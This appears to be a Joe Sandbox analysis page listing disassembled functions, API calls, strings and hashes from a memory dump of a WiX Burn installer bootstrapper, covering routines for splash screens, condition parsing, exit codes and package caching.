Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 399d20cab491843ba1dd2f9724f0445d5b976399071edb6ee1bb15510b5dcc63
Instruction ID: 48d23e027e426d59099f007d971081c758c10ca274e495e0d9bc36c7115d705f
Opcode Fuzzy Hash: 399d20cab491843ba1dd2f9724f0445d5b976399071edb6ee1bb15510b5dcc63
Instruction Fuzzy Hash: 74F1C571901616EEDF229FA48C45EAF7FB9FB44B60F14452AFD05AB240E7349E11CBA0

Function 005BCE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,005BD558,?,?,?), ref: 005BCEC7
GetLastError.KERNEL32(?,?,005BD558,?,?,?), ref: 005BCED4
ReleaseMutex.KERNEL32(?), ref: 005BD13C

Strings

failed to allocate memory for event name, xrefs: 005BCF1A
failed to allocate memory for mutex name, xrefs: 005BCF89
Failed to MapViewOfFile for %ls., xrefs: 005BD070
Failed to allocate memory for NetFxChainer struct., xrefs: 005BCEAD
Failed to memory map cabinet file: %ls, xrefs: 005BD028
Failed to create mutex: %ls, xrefs: 005BCFD6
NetFxChainer.cpp, xrefs: 005BCEA3, 005BCEF5, 005BCF5A, 005BCFC9, 005BD01B, 005BD063
%ls_mutex, xrefs: 005BCF75
%ls_send, xrefs: 005BCF06
failed to copy event name to shared memory structure., xrefs: 005BD09A
Failed to create event: %ls, xrefs: 005BCF67

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: fe56c960b3de92b7802f4abaca4eaca72942eb5b820dca3fcf96f94dcb066bbb
Instruction ID: 587492f5b52024befe89d0107865acfbd2eabae53adbe76fdc4affdfa36609b2
Opcode Fuzzy Hash: fe56c960b3de92b7802f4abaca4eaca72942eb5b820dca3fcf96f94dcb066bbb
Instruction Fuzzy Hash: 97814E76A42726FBD7219B648C0DFAA7FA4BF04760F050156FE04AB281E774ED00DAE4

Function 0059EA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 005D32F3: VariantInit.OLEAUT32(?), ref: 005D3309
Part of subcall function 005D32F3: SysAllocString.OLEAUT32(?), ref: 005D3325
Part of subcall function 005D32F3: VariantClear.OLEAUT32(?), ref: 005D33AC
Part of subcall function 005D32F3: SysFreeString.OLEAUT32(00000000), ref: 005D33B7

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,005DCA9C,?,?,Action,?,?,?,00000000,?), ref: 0059EB13
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0059EB5D

Strings

Failed to get @Action., xrefs: 0059EC69
comres.dll, xrefs: 0059EB26
Detect, xrefs: 0059EB04
Failed to resize Addon code array in registration, xrefs: 0059EC3C
Action, xrefs: 0059EAD0
Patch, xrefs: 0059EBDD
Upgrade, xrefs: 0059EB50
RelatedBundle, xrefs: 0059EA50
Invalid value for @Action: %ls, xrefs: 0059EC52
version.dll, xrefs: 0059EB70
Failed to get RelatedBundle element count., xrefs: 0059EA97
Failed to resize Detect code array in registration, xrefs: 0059EC2E
Failed to get @Id., xrefs: 0059EC62
Failed to resize Patch code array in registration, xrefs: 0059EC43
Addon, xrefs: 0059EB9A
cabinet.dll, xrefs: 0059EBBA
Failed to resize Upgrade code array in registration, xrefs: 0059EC35
Failed to get next RelatedBundle element., xrefs: 0059EC70
Failed to get RelatedBundle nodes, xrefs: 0059EA72

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: 14ffbd1145767bd2d4161d677079d608b1bebef33c57d8feb16df3f3bf840ec8
Instruction ID: cac045f6547ffb2a0d58f0edad18f9845dd7d38430888be64dd56ba2ba46224d
Opcode Fuzzy Hash: 14ffbd1145767bd2d4161d677079d608b1bebef33c57d8feb16df3f3bf840ec8
Instruction Fuzzy Hash: 94718C31A0561AFBCF24DBA4C946EAEBFB4FB04720F244255F951A72D1D771AE01CB90

Function 005A46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,005A4BF5,005DB4E8,?,feclient.dll,00000000,?,?), ref: 005A46F3
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,005A4BF5,005DB4E8,?,feclient.dll,00000000,?,?), ref: 005A4714
GetLastError.KERNEL32(?,005A4BF5,005DB4E8,?,feclient.dll,00000000,?,?), ref: 005A471A
ReadFile.KERNEL32(feclient.dll,00000000,005DB518,?,00000000,00000000,005DB519,?,005A4BF5,005DB4E8,?,feclient.dll,00000000,?,?), ref: 005A47A8
GetLastError.KERNEL32(?,005A4BF5,005DB4E8,?,feclient.dll,00000000,?,?), ref: 005A47AE

Strings

Verification secret from parent is too big., xrefs: 005A4775
Verification secret from parent does not match., xrefs: 005A4816
Failed to read verification process id from parent pipe., xrefs: 005A4861
feclient.dll, xrefs: 005A46E2, 005A4712, 005A4713, 005A47A7, 005A482C, 005A4882
msasn1.dll, xrefs: 005A482B
Verification process id from parent does not match., xrefs: 005A48FD
Failed to read size of verification secret from parent pipe., xrefs: 005A4748
Failed to inform parent process that child is running., xrefs: 005A48BB
Failed to read verification secret from parent pipe., xrefs: 005A47DC
pipe.cpp, xrefs: 005A473E, 005A4769, 005A47D2, 005A480A, 005A4857, 005A48B1, 005A48F1
Failed to allocate buffer for verification secret., xrefs: 005A4791

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 1233551569-452622383
Opcode ID: b73d7d7664d77ba27fb20247b5f15e44bce8009db13059817affd207c3164713
Instruction ID: 8f2f7afc9c26585c9aefe3515d22015033786e418d95cc25f873f84f32f2dd44
Opcode Fuzzy Hash: b73d7d7664d77ba27fb20247b5f15e44bce8009db13059817affd207c3164713
Instruction Fuzzy Hash: A151D736D412A6B7DF219AD55C46F6F7E68BB86B10F120126FE10BB280D7B49D009EE1

Function 005B27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to get @Protocol., xrefs: 005B2974
Failed to get @RepairArguments., xrefs: 005B288B
Repairable, xrefs: 005B289C
Failed to parse exit codes., xrefs: 005B290C
DetectCondition, xrefs: 005B2814
RepairArguments, xrefs: 005B287A
Failed to parse command lines., xrefs: 005B2988
Failed to get @InstallArguments., xrefs: 005B2847
Failed to get @DetectCondition., xrefs: 005B2825
UninstallArguments, xrefs: 005B2858
Failed to get @UninstallArguments., xrefs: 005B2869
Invalid protocol type: %ls, xrefs: 005B295C
none, xrefs: 005B2936
InstallArguments, xrefs: 005B2836
netfx4, xrefs: 005B2915
burn, xrefs: 005B28E0
Failed to get @Repairable., xrefs: 005B28B5
Protocol, xrefs: 005B28C3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: db9bf73d4258abe6d9a81c9a569b98ffd3e11809a4aa7b2222d7760fe2246140
Instruction ID: b097c2ab0b6243494b4fa077df02bf1866c335bb1c994c44bcc1d27c036949ba
Opcode Fuzzy Hash: db9bf73d4258abe6d9a81c9a569b98ffd3e11809a4aa7b2222d7760fe2246140
Instruction Fuzzy Hash: 54410A71E48763B6DB3556758C0AFABBE187B10B30F200322F924B62C1D760B94092F1

Function 00598F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,56005DDB,00000001,?,00599946,?,00000000,00000000,?,?,0059992E,?,?,00000000,?), ref: 00598FB2

Strings

NOT, xrefs: 005992DB
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 005991DE
Failed to set symbol value., xrefs: 00599060
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00599242
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00599408
condition.cpp, xrefs: 00599084, 0059914E, 005991CA, 0059922E, 0059936C, 005993B0, 005993F4
AND, xrefs: 005992BC
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00599380
-, xrefs: 00599118
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00599098
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00599162
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 005993C4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: StringType
String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3594736606
Opcode ID: 61cdad3c9ccdad9045931310650258b8ece52f9a26fe2f12539ca59566bddbb5
Instruction ID: 7c23d377a2a33ca25a4114ec9f0360b7aaacad09eb37ffc53633247cded0e6bd
Opcode Fuzzy Hash: 61cdad3c9ccdad9045931310650258b8ece52f9a26fe2f12539ca59566bddbb5
Instruction Fuzzy Hash: FAF1D075540202FBDF258F9CC889BAA7FB5FB04700F10494EF9199A684D3B5DA91DB90

Function 005A6BCA Relevance: 35.4, APIs: 6, Strings: 14, Instructions: 351synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0059D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,005A7040,000000B8,00000000,?,00000000,7694B390), ref: 0059D4B7
Part of subcall function 0059D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0059D4C6
Part of subcall function 0059D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,005A7040,000000B8,00000000,?,00000000,7694B390), ref: 0059D4DB

CreateThread.KERNEL32(00000000,00000000,005A57BD,?,00000000,00000000), ref: 005A6E34
GetLastError.KERNEL32(?,?,?,?,?,?,?,00594522,?,005DB500,?,00594846,?,?), ref: 005A6E43
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00594522,?,005DB500,?,00594846,?,?), ref: 005A6EA0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 005A6F92
CloseHandle.KERNEL32(00000000), ref: 005A6F9B
CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 005A6FB5

Part of subcall function 005BBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 005BBD0A

Strings

UX aborted apply begin., xrefs: 005A6C94
FHY, xrefs: 005A6EC1, 005A6E1F, 005A6EC4
Failed while caching, aborting execution., xrefs: 005A6E98
Another per-user setup is already executing., xrefs: 005A6CD8
Failed to elevate., xrefs: 005A6D94
Failed to set initial apply variables., xrefs: 005A6D02
"EY, xrefs: 005A6EC9, 005A6E14, 005A6ECC
Failed to cache user to working directory., xrefs: 005A6D71
core.cpp, xrefs: 005A6C8A, 005A6E67
Another per-machine setup is already executing., xrefs: 005A6DC8
Failed to create cache thread., xrefs: 005A6E71
Failed to register bundle., xrefs: 005A6DEE
user cannot start apply because it is busy with another action., xrefs: 005A6C28
crypt32.dll, xrefs: 005A6ECD, 005A6EE7, 005A6FB4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
String ID: "EY$Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$FHY$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 2169948125-2324368130
Opcode ID: e15f3fcc838217d5330a0a5eb80b7545fd7785f17b5d2e1f3d31d94b5423a204
Instruction ID: bc14109fddd6dd2666e87c856878e1912cd42fffb956f0ff178c44a4f9000966
Opcode Fuzzy Hash: e15f3fcc838217d5330a0a5eb80b7545fd7785f17b5d2e1f3d31d94b5423a204
Instruction Fuzzy Hash: F4C1BF72901216EFDF259F64C889BEE3EA8FF45714F08417AFD09AE185DB709940CBA1

Function 005B1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 005B1CB8
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 005B1CD6

Strings

error, xrefs: 005B1CC9
Failed to get next node., xrefs: 005B1DBE
Failed to get @Code., xrefs: 005B1D98
forceReboot, xrefs: 005B1D03
Failed to get exit code node count., xrefs: 005B1C03
ExitCode, xrefs: 005B1BBF
exeuser.cpp, xrefs: 005B1C39
Type, xrefs: 005B1C90
Code, xrefs: 005B1D25
Failed to parse @Code value: %ls, xrefs: 005B1D91
Failed to allocate memory for exit code structs., xrefs: 005B1C43
scheduleReboot, xrefs: 005B1CE5
Failed to get @Type., xrefs: 005B1DB7
success, xrefs: 005B1CA9
Failed to select exit code nodes., xrefs: 005B1BDE
Invalid exit code type: %ls, xrefs: 005B1DA7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeuser.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: 2ca014edaa30fe9e6ed3a28239181117fe7931f48a49f5a85c2c4c0e047912a9
Instruction ID: f80b527e2ffec05921667564d5dbee5e85e0ed3962fbcc35fa4e9f5cabc74ebc
Opcode Fuzzy Hash: 2ca014edaa30fe9e6ed3a28239181117fe7931f48a49f5a85c2c4c0e047912a9
Instruction Fuzzy Hash: 1861D031A0561AFFDB249B95CC55EEEBFA4BF40720F604656F421AB2D0DB70AE00DB94

Function 005D77F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 005D7857
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 005D787C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 005D789C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 005D78CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 005D78EB
SysFreeString.OLEAUT32(00000000), ref: 005D7916
SysFreeString.OLEAUT32(00000000), ref: 005D798D
SysFreeString.OLEAUT32(00000000), ref: 005D79D9

Strings

msi.dll, xrefs: 005D7975
href, xrefs: 005D786E
comres.dll, xrefs: 005D78A6
version.dll, xrefs: 005D78FA
length, xrefs: 005D788E
type, xrefs: 005D78DD
feclient.dll, xrefs: 005D7889
title, xrefs: 005D78C1
rel, xrefs: 005D784A
msasn1.dll, xrefs: 005D79C7
`Dv, xrefs: 005D7916, 005D798D, 005D79D9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$Compare$Free
String ID: `Dv$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-1313079583
Opcode ID: bd33ef9a2d0d56e25706a1e65a943801c1d8f62d1fa8c9e286b13c8e3960561c
Instruction ID: 86cd96a18e6298411853c17f00903387452e1d10c63d06a36b746ecdff7f222a
Opcode Fuzzy Hash: bd33ef9a2d0d56e25706a1e65a943801c1d8f62d1fa8c9e286b13c8e3960561c
Instruction Fuzzy Hash: 3061307290511DBBDB25DB98CC55EADBFB9BF08320F200667E521A7290E7309E50EB50

Function 005D8134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 005D8161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 005D817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 005D821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,005DB518,00000000), ref: 005D825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 005D82B1
CompareStringW.KERNEL32(0000007F,00000000,005DB518,000000FF,true,000000FF), ref: 005D82CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 005D8307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 005D844B

Strings

version, xrefs: 005D8250, 005D82F9
upgrade, xrefs: 005D8211
http://appsyndication.org/2006/appsyn, xrefs: 005D8154
application, xrefs: 005D816E
true, xrefs: 005D82C1
apuputil.cpp, xrefs: 005D836E
type, xrefs: 005D81A7
exclusive, xrefs: 005D82A3
enclosure, xrefs: 005D8439

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: 680559adaf46e1a8b69c66526ea092b07af6227100e30ed68c2ccf76ab348955
Instruction ID: da63a9200e6e9bf9e83ed13c9085e29a295b9e7ca9a9066d54301bb0d1c1a41c
Opcode Fuzzy Hash: 680559adaf46e1a8b69c66526ea092b07af6227100e30ed68c2ccf76ab348955
Instruction Fuzzy Hash: C4B16A71504606ABDF318F98CC85F6A7BA6BB44724F218A5BF925AB3D1DB70E840DB00

Function 005AE3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005AE2AF: LoadBitmapW.USER32(?,00000001), ref: 005AE2E5
Part of subcall function 005AE2AF: GetLastError.KERNEL32 ref: 005AE2F1

LoadCursorW.USER32(00000000,00007F00), ref: 005AE429
RegisterClassW.USER32(?), ref: 005AE43D
GetLastError.KERNEL32 ref: 005AE448
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 005AE54D
DeleteObject.GDI32(00000000), ref: 005AE55C

Strings

WixBurnSplashScreen, xrefs: 005AE436, 005AE548
Unexpected return value from message pump., xrefs: 005AE537
Failed to create window., xrefs: 005AE4DF
Failed to load splash screen., xrefs: 005AE401
splashscreen.cpp, xrefs: 005AE46C, 005AE4D5
Failed to register window., xrefs: 005AE476

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: e4bb62a41823580f7b6fbfdf798822394d8d7b4384459bcdbf031e16657a2913
Instruction ID: 5bfbbd5a6ff0a366d63ca4e26accfc16eb8dae7bcd9125bfc5b78321899ae100
Opcode Fuzzy Hash: e4bb62a41823580f7b6fbfdf798822394d8d7b4384459bcdbf031e16657a2913
Instruction Fuzzy Hash: C141A676901226FFEF219BD4ED0AAAEBFB9FF09710F110526FA01A6150E7709D049B91

Function 005B9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,005BBC85,00000001), ref: 005B9E46
GetLastError.KERNEL32(?,005BBC85,00000001), ref: 005B9FB6
GetExitCodeThread.KERNEL32(00000001,00000000,?,005BBC85,00000001), ref: 005B9FF6
GetLastError.KERNEL32(?,005BBC85,00000001), ref: 005BA000

Strings

Failed to execute MSU package., xrefs: 005B9EFB
Failed to execute package provider registration action., xrefs: 005B9F17
Failed to execute EXE package., xrefs: 005B9E7D
Cache thread exited unexpectedly., xrefs: 005BA047
apply.cpp, xrefs: 005B9FDD, 005BA027
Failed to wait for cache check-point., xrefs: 005B9FE7
